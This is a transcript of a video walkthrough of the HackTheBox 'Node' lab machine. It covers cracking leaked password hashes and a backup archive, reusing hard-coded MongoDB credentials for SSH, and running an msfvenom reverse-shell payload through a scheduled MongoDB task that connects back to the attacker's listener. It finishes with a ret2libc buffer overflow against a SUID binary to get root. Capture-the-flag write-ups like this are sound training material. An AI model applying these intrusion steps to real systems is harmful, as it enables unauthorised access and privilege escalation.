What's going on? Today we're doing Node.js enumeration and exploitation. Before talking about this, let's talk about the definition of Node.js. So basically Node.js is a JS framework, JavaScript framework, used for building network applications, and it's used for speed and flexibility. So basically all of the time Node.js preferred for scalable and faster applications. An example of using Node.js for building network applications is building a chat application. If you're building chat application or even game applications like gaming applications that runs on the browser are preferred to be run on Node.js all the time because Node.js provides speed, flexibility, and so on. Node.js can be front end and back end, and most of the comparisons made with other frameworks is PHP. So basically all the time we hear comparison between what the difference between PHP and Node.js. Well, they both can be used to build applications, web applications, network applications, but basically if you want speed you would go for Node.js, but speed comes at a price. So you have to always update your Node.js framework, make sure it's not outdated, there are no active CVEs and exploits for the current version that you run. And in addition, you have to make sure that you harden the directories where Node.js is stored. For example, if you want to enumerate Node.js, an application or web server that is using Node.js, we always look for hard-coded credentials. And we also look for scheduled jobs and calls to binaries and scripts. So basically hard-coded credentials are very common in Node.js, API keys even. Also scheduled jobs. Sometimes we notice that there are some scripts that contain calls or scheduled calls to binaries. Most often these scripts are found under /var. Mostly /var/scheduler. So if you find this directory under /var, you would make sure that so if you find scheduler under /var, it's a great possibility that you would find some scheduled jobs. And also we would look for hard-coded credentials. Mostly hard-coded credentials are stored under JS files. An example is app.js. And calls to binaries and scripts. Sometimes JavaScripts stored under the var website contain calls to binaries or scripts or programs in Linux. Sometimes if you take a look at these calls, it might be revealed that there are some API keys, some passwords, whatever. So that is a nutshell about Node.js and its enumeration. So basically an active example of enumerating Node.js is HackTheBox Node or HackTheBox Node, which we will be doing today. And in addition to the node concepts that we found in this machine, there is also the Buffer Overflow, RET2GOT methods, in which you would use, guys, if there is NX enabled on the binary and if there is ACLR protection. So ACLR means memory addresses change every time, and also NX prevents execution at the stack, which means the exploitation of buffer overflow will be harder. That's why we will use the method RET2GOT. So RET2GOT, we try to find the system address, we try to find the exit address, and the libc, of course, and lastly we try to find the address of bin/sh in order to use this method for BOF exploitation, of course. And of course we don't forget that these addresses will be used inside a script to perform the exploitation. So basically we have to, why do we need to find the libc address? Because it's used in the calculation of exit and sys address. And we can use many other tools. Some of the tools we can use is R2 for reverse engineering. We can use LDD to find the addresses. We have several options. So let's get started and see how this works. So always we begin with nmap scan. we have 22 and we have 3000. And on port 3000 there is Hadoop Task Tracker Apache Hadoop running. These are the only two ports open, so we're gonna jump and we see the page displaying welcome to my place, say hi to our newest members, and notice that the page runs on port 3000. Don't forget this, and that's it. That's the page. So there is a login button here. You click on that, you'll be required to provide username and password. So that's it about the page. Why this is running, let me jump now to Purpose Suite and show you the requests. So we go to proxy, don't turn on the intercept, just enough to go to HTTP history and take a look at the requests the application is making. So when we browse to the main page, but upon browsing the main page, I see these several requests that have been made followed by my visits. So once I visited the page, I saw these requests. As you can see, several requests to several pages I didn't make requests to. And lastly, I can see we have image, profile, favicon, and some interesting ones. So we have partials, /login, and we have /API users latest. In the command line, let's use curl. So curl, yeah, so HTTP 10 10 10 5 8 3000 /APIs /users /latest. And as you can see, we received a JSON response. The JSON response contains what seem to be usernames and passwords and IDs. So that's the first ID, the username Tom, the password is this. The password is in the form of a hash, as you can see, and it is actually SHA-256. Is admin false? And here is it's telling you whether the user is admin or not. And also we have the other users. So if you take a note here, you can see that most of the users are not admins. We want to log in as an admin as the first step to hacking this web application. So I'm going to go back and change that to users. And you see here, that's the first ID, username, password is admin true. So that's the only user who got the admin privilege. So the only thing left here is to find the plain text password of this hash. I'm going to take this and say hash identifier, paste in here. So the password, the hash is SHA-256. So basically we're going to use hashcat for this password. So exit hashcat -a0, and the mode for SHA-256 is 1400. And then we type in the hash itself, and we define the word list, share word lists, raw queue. Let's see here. So the password is Manchester. So we take that and we go back to the login page, log in with this password, see what do we have. So I have a button for a backup download. By the way, if you download the backup using the browser, it won't be stable. So it's better you download this using wget. So we jump back to the terminal and download this with wget. So you can use the following command, wget, and don't forget to provide the cookie, as the download or the file download requires you to be logged in. Hence, you will need the -- header option in wget to specify the cookie. How do you get the cookie? You go back to your session and right click, go to inspect elements or browser developer tools, cookie editor. In here you will find the cookie. The name is connect with SID and this is the value. Specify that in your wget command and you will be able to download the file. I already did that because it's not the first time with this machine, so I'm just gonna ls, and as you can see, this is the backup file. Or no, this is not the backup file I want. Okay, let me make directory backup cd file exists. Okay, cd backup to wget. You got me, guys. I'm gonna issue the command. So Where is the command? Oh, come on, I don't want to write this from scratch. It's pain. Okay, wget. Oh, okay, it's here. The laggy machine worked. So we have the backup file, ls. Okay, so now what we're gonna do, we're gonna try to see the kind of file we have. File backup ASCII text, so it's not compressed file. If you cat backup, you will see a long base64 encoded content. So we're gonna decode this. Cat backup and then base64-d. Now it's different. All right. Now we're gonna forward this to a new backup file called backup v2.zip because it's clear this is zip content. ls. So we have the backup zip2 file. Let's try with gunzip backup zip2. Suffix ignored. Okay, let's use unzip. Will unzip work? And we need a password. Okay, we can crack the password. It's no brainer. We can use a tool called fcrack. Fcrack command not valid. Okay, fcrack zip. Okay, so we have the tool. So we're gonna run the tool against this. Crack zip. And we're gonna specify a user list or word list. You can also use the help menu -h. Let's take a look at the help menu. So here we use unzip at the same time. Here is the method dictionary to provide a word list of dictionary, and we have here the benchmark. We're going to use benchmark. We're going to opt this option. Use string as initial password file. Alright, so fcrack zip dash. The first option will be we're gonna use the -u method to use unzip, and then we're gonna provide the word list, and we're gonna then do the initial password p. So the word list will be user share, of course, all the time word list rock.txt. And lastly, we specify the backup file v2, and let's see what happened. Password found. That's fast. The password is magic word. We're gonna now unzip the file again. Provide the password, and we have unzipped the file. So let's take a look now at the var directory. By the way, this seems to be a backup of the website itself. As you can see, the directory is var /www/myplace, and the website name actually happens to be myplace. So this is the backup of the site, and it is Node.js, if you can see here from the directory structure. So let's go to var and ls cd www cd myplace. So we have, as you can see, package JSON, app.js, app.html, static. So clearly it's JavaScript application, right? So what we're gonna do, we're gonna take a look at the app.js. It's all the time interesting. This file, we're gonna add cat app.js. Okay, so it's a long file. No, it's not that long actually. We can parse it easily. Let's see here. So these are variable definitions, and they are constant variables, and we see instant connection instance to Mongo database. If you take a look here, constant URL MongoDB mark, and this is the username used to log into the Mongo database. This is the password. That's great. At localhost on port 27017. So here you go. That's the first plain login credentials. Now, since we are still outside the machine, we didn't get the first foothold, we cannot connect to the Mongo database, especially that the nmap scan didn't reveal any open port for a database. As you can see, the only two open ports are 3000 and 22, which means we cannot use these credentials against the Mongo database, which means we're going to need to try these credentials on something else. The only something else exists actually is the SSH, closed purpose suite. We don't need this anymore. Yes. So now SSH mark at 10. Okay, it's written, and the password is this. So there you go. Now this is the first foothold on the machine. SSH access. We landed this foothold by just taking advantage of hard-coded credentials in the website files. So what do we do now? Let's see who we are. We are Mark, and we are under home mark ls. So it seems that there is nothing stored under the mark home directory. So it means we're going to need to take a look at other users. So cat etc pass wd, and see we have other users as expected. We have Tom and we have MongoDB. The first thing we're going to do is to go to Tom, see if we can escalate to Tom. So we would type ps aux. We're going to see what are the running processes under Tom. Grab Tom. So we have one process, or two processes actually. The one that's interesting is this one, var scheduler app.js, running by Node. So two processes being run by Node, and we're going to take a look at both. First, let's take a look at this. So cd var, well, let's copy that, it's better. So we have a couple files here. We're going to take a look at app.js. So in addition to the credentials we have uncovered, we can see here there is something going on in the task collection. The tasks is actually a collection. The collection in MongoDB corresponds to a table in the MySQL database. So there is docs here, and inside the docs there is task being executed. Scheduled task actually executes all of the records inside the tasks, and specifically the CMD. So what we're going to do here, we're going to insert some sort of record, and we're going to assign value to the CMD here. So every time this schedule job runs, it's going to connect to the database. It's going to say, yeah, I have records inside tasks, the documents, and I'm going to execute the CMDs in there. So let's first grab the credentials and connect to the database. So Mongo localhost 27017. Don't forget to specify the port / scheduler. Nope, we have a problem here. So Mongo localhost, specify the port 27017 / scheduler. So Mongo localhost 27017, specify the port, specify the instance, and then the username Mark, and the password is this one. So let's connect and add that record we talked about. So let's now insert the record we talked about. We're going to insert now a record under the CMD in the collections called tasks. So how do we do that? Let's go back. Let's see here. So we can create now documents inside the collections using these commands. Since we will create only one, we can use db insert one. So db, and then specify the collections, which is tasks, and then specify insert one. And then two parentheses. Inside the parentheses, we're going to specify also two double quotes, two braces, curly braces, and type in here CMD. So what is the command that we would like to execute? We're going to generate now an MSF Venom payload. We're going to execute this payload on the target machine. So sudo MSF, I think I have it here, ls, it's called shell elf, but the command is MSF Venom -p Linux x86, depends on the architecture, of course. Shell reverse my hands are shuddering because of cold. I can't type on the keyboard. So TCP lhost, specify lhost. I'm not gonna do it now. I'm gonna save time. The machine made me crazy actually. And then lport, maybe it could be 4545. And then you can let's type a name for this, -f, the extension elf, and the output will be shell.elf. You enter this and you'll get the payload. So basically I have it here, shell.elf. Now I'm gonna need to upload this to the target machine. So I'm gonna take advantage of the current SSCP connection I have to the web server, to the server. So using SCP, we can upload the shell itself. Mark, so I have it here, right? So I'm gonna upload this under temp. That's the command to upload the shell to the SSH server. So we're gonna hit enter. And the file has been uploaded. Now it's time to specify what we would like to do with this file. So we go back here and say the CMD is to execute the file itself, right? So, and by the way, don't forget to give permissions by typing chmod +x to the shell. If you don't give permissions, it's not gonna work. We go back here and say the command that we would like to execute is /temp/shell.elf. Let's open this one on my machine, nc-lvp 4545, and wait for the incoming connection. I'm gonna hit enter, and the job has been scheduled on the Mongo database now. We can type .db.find.tasks.find to find what are the current documents scheduled to run. As you can see, we have one. Once this has been executed, it's gonna disappear. So let's try again. Paste. Not executed yet. Let's wait for the connection to come. db.tasks.find. And yes, the job has been run, and now as you can see, we received the shell. Now let's grab some sort of let's stabilize the shell, and now we have another shell, Tom at Node. So now let's go back to the var www directory ls cd myplace, and if you remember, we noticed that there was another job or another process running under Tom. It was at myplace cd myplace ls, and this time it was, let's see here, so we have app.html and we have gs node. Okay, so let's get app.js again. Okay, let's see here. So this is the contents of the file, and we see the same connection to the database MongoDB, but here we have a backup key. So this is an example of hard-coded credentials. This is you can consider it as API key or whatever. So it's backup key. There must be some use of this backup key. If you scroll down, let's see if there are some binary or a script using that key. Let's scroll down. App session, authenticate, and here. So as you can see, there is a variable called proc to create that spawns a process. The process location is user local bin backup, and here it defines the option -q, and it uses the backup key. It seems that the process responsible for backing up the site on a regular basis is located at user local bin backup. So here's a call to a binary or script to create a backup for the site, and it uses a hard-coded credential which we found stored in the backup key, and then it's being spawned by the GS file here we saw. So basically we're going to need to investigate this binary and see if there is any opportunity to make it do a backup for the root directory in order to display the flag. So let's go now to, let's examine the permissions on this file. ls-la Okay. So the file has the suit bit set, and as you can see here, the admin group can run the file. Let's see if Tom is part of the admin group. So this is Tom, and Tom is actually part of the admin group, as you can see. Now it means Tom can run the backup if you right on the backup. So there must be a way to exploit this file, especially that the admin group can also run this file. So if we type ID, we can see we are inside the admin group, which means we can run this file. So long story short, what we're gonna need to do, we're gonna need to grab a copy of that to the local machine, and we're gonna need to analyze it. Before doing this, let's see if ACLR is enabled on the machine. So cat proc sys kernel randomize va space 2, which means ACLR is enabled. So we grab a copy of that to my local machine, and I'm gonna start to see if there is BOF on that binary. So going to my machine, I have a copy of that backup, as you can see here, and you also need the keys. The keys are the API keys to run the file. Okay, now we're gonna run the file now. So backup and specify one of the API keys. And here, instead of specifying the directory to backup, I'm going to provide or supply a string. You're going to see if the program will crash or will hit a crash point if we provide some sort of long input. Python 2-c print. So let's start with A's. And we can say 505, and lastly we need to put a single quote, and that's it. Let's try it here. So let's copy these and go to the machine itself. Maybe we can run this here. Oh, we forgot to specify the directory of the file. Okay. So user local bin backup. And as you can see, we received segmentation fault, which means the program is actually suffering from BOF vulnerability. So segmentation fault at 508. Now you could try 507, you could try 506. It's not going to crash. It's crashing exactly at 508, which means we will need now to start the buffer overflow exploitation. Before doing this, we noted that ACLR protection is enabled and also NX is enabled, which means the memory addresses are changing and execution is prevented at the stack, which means we're going to need to find, as I mentioned earlier in the video, the addresses of sys, exit, libc, and lastly the bin sh. We can do that with LDD. So LDD user local bin backup. All right, so as you can see, the libc exists at this address. So next we're going to find the address of the system. Make sure to run these commands on the target machine, not on your machine. -s lib32 -libc dot, what was this, .so .6. Okay, and we're gonna grep for system in here. Grep system. Let's take a look here. So the correct address is this one, and this is the address. Lastly, not lastly, of course, we're going to find the one with system. So read elf-s lab32 /lebc.so 6 and grep the exit address, similar to RET to libc, but this time we're doing RET2GOT. exit. And the correct exit address is, let's take a look here. So we have this one, and we have this one, but this is the correct one. And lastly, we need to extract the address of bin.sh. You can do that with strings -a-tx /lib32/labc.so.6, and lastly we grep bin.sh. Command not found. What is this? Oh, we forgot the s, so not string, it is strings. No such file or directory. Again, we have another typo in here. So instead of s, it is c.so.6 grep/bin/sh. And we finally got the address. Now we can wrap all of these addresses in one script file. So let's go down to my machine and show you guys the script. Clear ls nano exploit.py. So this is the script actually, and we used struct so that we can write the addresses as we saw them. We don't need to invert them for the little endian. We can just type them as they are. And this is address, as you can see, is calculated by adding the libc address with the offset we found. The same with the exit address. It is calculated by adding the libc address with the address we have found. So we can't use the addresses as is. We need to add them to the libc. That's the method of using RET2GOT for buffer overflow. And we use a pattern of 512 A's with the addresses we have just found, and we, as you can see, store them in variable called payload. After that, we try them against the user local bin backup. So we supply, instead of supplying the directory to backup, we supply the actual payload. So all left is to upload this script to the machine itself. As you can see, we use the current SSH connection we have, and we upload the script file to the destination/temp. The password, and now the exploit has been uploaded to the temp directory. Now we go to our current session. Let's see here. As you can see, the payload supply, or let's see, and now you are the root user. cd temp cd root ls cat root.txt, and here is the root flag.